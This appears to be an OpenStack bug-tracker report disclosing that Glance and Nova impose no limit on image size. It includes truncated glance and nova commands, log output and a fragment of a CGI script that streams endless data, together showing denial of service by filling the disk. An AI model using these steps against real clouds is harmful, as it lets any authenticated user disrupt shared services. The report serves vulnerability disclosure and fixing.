No limits on image size
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Glance |
Opinion
|
Undecided
|
Unassigned | ||
OpenStack Compute (nova) |
Opinion
|
Medium
|
Unassigned | ||
OpenStack Security Advisory |
Won't Fix
|
Undecided
|
Unassigned |
Bug Description
Using Epel Essex packages on RHEL 6.3
Glance should impose configurable limits (or tenant quotas) on the size of the images it allows to be registered and/or uploaded.
Two separate example exploits here
1. Glance Denial of Service by file system exhaustion
2. Nova Compute Denial of Service by file system exhaustion
= 1 =
Using the glance x-image-
$ glance add name="big image" disk_format=raw container_
Failed to add image. Got error:
The request returned a 413 Request Entity Too Large. This generally means that rate limiting or a quota threshold was breached.
The response body:
413 Request Entity Too Large
The body of your request was too large for this server.
Image storage media is full: There is not enough disk space on the image storage media.
Note: Your image metadata may still be in the registry, but the image's status will likely be 'killed'.
$ ls -lh /var/lib/
-rw-r--r--. 1 glance glance 87G Jul 27 13:03 /var/lib/
$ df -h /var/lib/
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/
this would allow any authenticated user to preform a denial of service on a glance server, with a file system backend. I havn't looked into swift but will it just keep going until is starts filling up storage nodes?
= 2 =
Nova is also open to a similar exploit, by using the x-image-
# Registering an image 1TB in size (can go bigger if needs be)
$ glance add name="big image" disk_format=raw container_
Added new image with ID: 1a528173-
$ glance index
ID Name Disk Format Container Format Size
-------
1a528173-
$ nova boot --flavor 1 --image 1a528173-
# the filesystem now fills up, the boot fails and nova deletes the partial download
# next I check the apache logs to see how much nova downloaded.
"GET /cgi-bin/t.cgi HTTP/1.1" 200 93406637550 "-" "-"
# Note : I know I will probably not get the same compute node next time but
# this will at least give me an idea of what size might be tolerated.
# edit cgi script [1] to change the content length to something slightly smaller then 93406637550
$ glance add name="smaller big image" disk_format=raw container_
Added new image with ID: a5eb1eab-
$ glance index
ID Name Disk Format Container Format Size
-------
a5eb1eab-
1a528173-
$ nova boot --flavor 1 --image a5eb1eab-
$ ls -lh /var/lib/
-rw-r--r--. 1 qemu qemu 85G Jul 27 14:13 /var/lib/
$ df -h /var/lib/
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/
$
[1] Standard http cgi script used as the vm image
#!/usr/bin/python
import os, sys, uuid
print "Content-Type: text/html"
#print "Content-Length: 1099511627776" # this shouldn't be present for first exploit
print
data = ''.join(
if os.environ.
while 1:
print data
summary: |
- Glance doesn't impose any limits on image size + No limits on image size |
Changed in glance: | |
milestone: | none → folsom-rc1 |
status: | Incomplete → Triaged |
Changed in glance: | |
importance: | Undecided → Critical |
no longer affects: | glance |
Changed in nova: | |
milestone: | folsom-rc1 → none |
tags: | added: folsom-rc-potential |
tags: |
added: folsom-backport-potential removed: folsom-rc-potential |
Changed in ossa: | |
importance: | Undecided → Medium |
status: | Incomplete → Confirmed |
status: | Confirmed → Incomplete |
importance: | Medium → Undecided |
no longer affects: | glance |
Changed in nova: | |
status: | Incomplete → Invalid |
Changed in nova: | |
status: | Invalid → Incomplete |
Changed in nova: | |
status: | Confirmed → Opinion |
Changed in glance: | |
status: | New → Opinion |
Adding Brian Waldon and Vish to confirm impact